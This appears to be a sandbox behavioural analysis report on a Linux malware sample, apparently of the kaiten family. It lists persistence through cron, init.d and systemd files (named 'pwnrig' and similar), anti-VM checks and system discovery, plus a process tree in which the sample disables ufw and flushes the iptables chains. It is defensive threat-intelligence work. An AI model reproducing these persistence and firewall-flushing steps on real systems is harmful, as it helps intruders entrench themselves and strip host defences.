kaiten | e74418466797c11a2fea1fa024403b0e6bf46d568e5bfa6fe304c524708f1f8c

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Creates/modifies Cron job 1 TTPs 17 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561ateesedcrontab

description	ioc	process
File opened for modification	/etc/cron.hourly/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.d/sed9GTDJf	sed
File opened for modification	/etc/cron.hourly/sediHF9mf	sed
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/var/spool/cron/crontabs/tmp.H0xTww	crontab
File opened for modification	/var/spool/cron/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.daily/seduVEBfg	sed
File opened for modification	/etc/cron.d/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.daily/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.weekly/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.monthly/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.monthly/sedNHl54h	sed
File opened for modification	/etc/cron.weekly/sedRNlT4e	sed

Enumerates active TCP sockets 1 TTPs 3 IoCs

Gets active TCP sockets from /proc virtual filesystem.

System Network Connections Discovery

T1049

Processes:

lsoflsofd8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

description	ioc	process
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/tcp	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 3 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561ateesed

description	ioc	process
File opened for modification	/etc/init.d/dpkg-deb-package	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sedRJFd9d	sed

Modifies systemd 1 TTPs 3 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561atee

description	ioc	process
File opened for modification	/etc/systemd/system/dpkg-deb-package.service	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee

Reads hardware information 1 TTPs 28 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Writes file to system bin folder 1 TTPs 5 IoCs

Hijack Execution Flow

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561acpcpcpcp

description	ioc	process
File opened for modification	/bin/dpkg-debian	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr	cp

Changes its process name 1 IoCs

Processes:

description ioc pid

Changes the process name, possibly in an attempt to hide itself (sysv-install) 1728

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	1728

Checks CPU configuration 1 TTPs 6 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571grepgrep-bash-18a624c0-9026-4abf-81dd-8b579c9ce571grepgrep

description	ioc	process
File opened for reading	/proc/cpuinfo	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep

Reads CPU attributes 1 TTPs 17 IoCs

System Information Discovery

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571pgreppgrep-bash-18a624c0-9026-4abf-81dd-8b579c9ce571pspspgreppgreppspspspspkill

description	ioc	process
File opened for reading	/sys/devices/system/cpu/possible	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/possible	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/types	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/types	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Reads system network configuration 1 TTPs 40 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

Processes:

lsoflsofd8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

description	ioc	process
File opened for reading	/proc/net/netlink	lsof
File opened for reading	/proc/net/unix	lsof
File opened for reading	/proc/net/udplite	lsof
File opened for reading	/proc/net/sctp/eps	lsof
File opened for reading	/proc/net/sctp/eps	lsof
File opened for reading	/proc/net/icmp	lsof
File opened for reading	/proc/net/ipx	lsof
File opened for reading	/proc/net/sockstat6	lsof
File opened for reading	/proc/net/sockstat6	lsof
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/tcp6	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/udp	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/udp6	lsof
File opened for reading	/proc/net/udplite6	lsof
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/udp	lsof
File opened for reading	/proc/net/unix	lsof
File opened for reading	/proc/net/udp6	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/tcp6	lsof
File opened for reading	/proc/net/sockstat	lsof
File opened for reading	/proc/net/sctp/assocs	lsof
File opened for reading	/proc/net/ipx	lsof
File opened for reading	/proc/net/raw6	lsof
File opened for reading	/proc/net/tcp6	lsof
File opened for reading	/proc/net/raw6	lsof
File opened for reading	/proc/net/ax25	lsof
File opened for reading	/proc/net/packet	lsof
File opened for reading	/proc/net/sctp/assocs	lsof
File opened for reading	/proc/net/ax25	lsof
File opened for reading	/proc/net/packet	lsof
File opened for reading	/proc/net/sockstat	lsof
File opened for reading	/proc/net/udplite	lsof
File opened for reading	/proc/net/tcp	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/raw	lsof
File opened for reading	/proc/net/udp6	lsof
File opened for reading	/proc/net/udplite6	lsof
File opened for reading	/proc/net/icmp	lsof
File opened for reading	/proc/net/raw	lsof
File opened for reading	/proc/net/netlink	lsof
File opened for reading	/proc/net/udp	lsof

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571-bash-18a624c0-9026-4abf-81dd-8b579c9ce571systemctld8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561asystemctlmodprobesystemctlsystemctl

description	ioc	process
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/target_node	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/meminfo	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/target_node	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/kernel/mm/hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/cpumap	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/devices	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/devices/target_node	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pkillpslsoflsofsystemctld8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561apspspspspgreppgrepawkpgreppspgrepsystemctl

description	ioc	process
File opened for reading	/proc/587/cmdline	pkill
File opened for reading	/proc/1074/stat	ps
File opened for reading	/proc/242/fdinfo/4	lsof
File opened for reading	/proc/504/stat	lsof
File opened for reading	/proc/1/fdinfo/142	lsof
File opened for reading	/proc/455/fdinfo/35	lsof
File opened for reading	/proc/200/cmdline	pkill
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/fdinfo/19	lsof
File opened for reading	/proc/1004/fd	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/1/fdinfo/90	lsof
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/77/stat	ps
File opened for reading	/proc/1063/stat	ps
File opened for reading	/proc/455/fdinfo/5	lsof
File opened for reading	/proc/24/fd	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/954/stat	ps
File opened for reading	/proc/1440/cmdline	ps
File opened for reading	/proc/440/fd	lsof
File opened for reading	/proc/1108/fd	lsof
File opened for reading	/proc/140/status	pgrep
File opened for reading	/proc/200/stat	ps
File opened for reading	/proc/1072/fdinfo/2	lsof
File opened for reading	/proc/1457/status	pkill
File opened for reading	/proc/242/fdinfo/55	lsof
File opened for reading	/proc/895/fdinfo/12	lsof
File opened for reading	/proc/171/status	pgrep
File opened for reading	/proc/166/stat	ps
File opened for reading	/proc/1348/fdinfo/1	lsof
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/85/fd	lsof
File opened for reading	/proc/1338/cmdline	ps
File opened for reading	/proc/1022/cmdline	pgrep
File opened for reading	/proc/9/status	pgrep
File opened for reading	/proc/1442/stat	ps
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/105/status	pkill
File opened for reading	/proc/674/cmdline	pkill
File opened for reading	/proc/1073/status	ps
File opened for reading	/proc/689/fdinfo/57	lsof
File opened for reading	/proc/693/status	pgrep
File opened for reading	/proc/641/status	pgrep
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/895/fdinfo/12	lsof
File opened for reading	/proc/242/cmdline	pgrep
File opened for reading	/proc/641/status	ps
File opened for reading	/proc/1697/cmdline	ps
File opened for reading	/proc/1078/fdinfo/8	lsof
File opened for reading	/proc/908/status	ps
File opened for reading	/proc/85/stat	ps
File opened for reading	/proc/175/status	ps
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1080/fd	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/1223/status	ps
File opened for reading	/proc/173/cmdline	pkill
File opened for reading	/proc/self/auxv	ps
File opened for reading	/proc/175/status	pgrep
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/242/fdinfo/75	lsof
File opened for reading	/proc/895/fdinfo/10	lsof
File opened for reading	/proc/1077/fdinfo/10	lsof
File opened for reading	/proc/1079/fd	lsof

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

Processes:

shd8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a-python37-590b56ce-9e47-4539-accf-0eb74a649a38-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

description	ioc	process
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/-python37-590b56ce-9e47-4539-accf-0eb74a649a38	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/tmp/.bashirc	-python37-590b56ce-9e47-4539-accf-0eb74a649a38
File opened for modification	/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/tmp/.lock	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

/tmp/d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
/tmp/d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
1⤵
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Reads system network configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1442

/usr/bin/bash
bash -c "ufw disable"
2⤵
PID:1446

/usr/sbin/ufw
ufw disable
2⤵
- Flushes firewall rules
PID:1446

/usr/sbin/iptables
/usr/sbin/iptables -V
3⤵
PID:1450

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
PID:1451

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:1452

/sbin/modprobe
/sbin/modprobe ip6_tables
5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:1453

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:1455

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:1459

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:1460

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
PID:1461

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:1462

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:1463

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
PID:1464

/sbin/iptables
iptables -F ufw-reject-input
4⤵
PID:1465

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
PID:1466

/sbin/iptables
iptables -F ufw-after-input
4⤵
PID:1467

/sbin/iptables
iptables -F ufw-user-input
4⤵
PID:1468

/sbin/iptables
iptables -F ufw-before-input
4⤵
PID:1469

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
PID:1470

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:1471

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:1472

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:1473

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:1474

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:1475

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:1476

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:1477

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:1478

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:1479

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:1480

/sbin/iptables
iptables -F ufw-track-input
4⤵
PID:1481

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:1482

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:1483

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:1484

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:1485

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:1486

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:1487

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:1488

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:1489

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:1490

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:1491

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:1492

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
PID:1493

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:1494

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:1495

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
PID:1496

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
PID:1497

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
PID:1498

/sbin/iptables
iptables -Z ufw-after-input
4⤵
PID:1499

/sbin/iptables
iptables -Z ufw-user-input
4⤵
PID:1500

/sbin/iptables
iptables -Z ufw-before-input
4⤵
PID:1501

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
PID:1502

/sbin/iptables
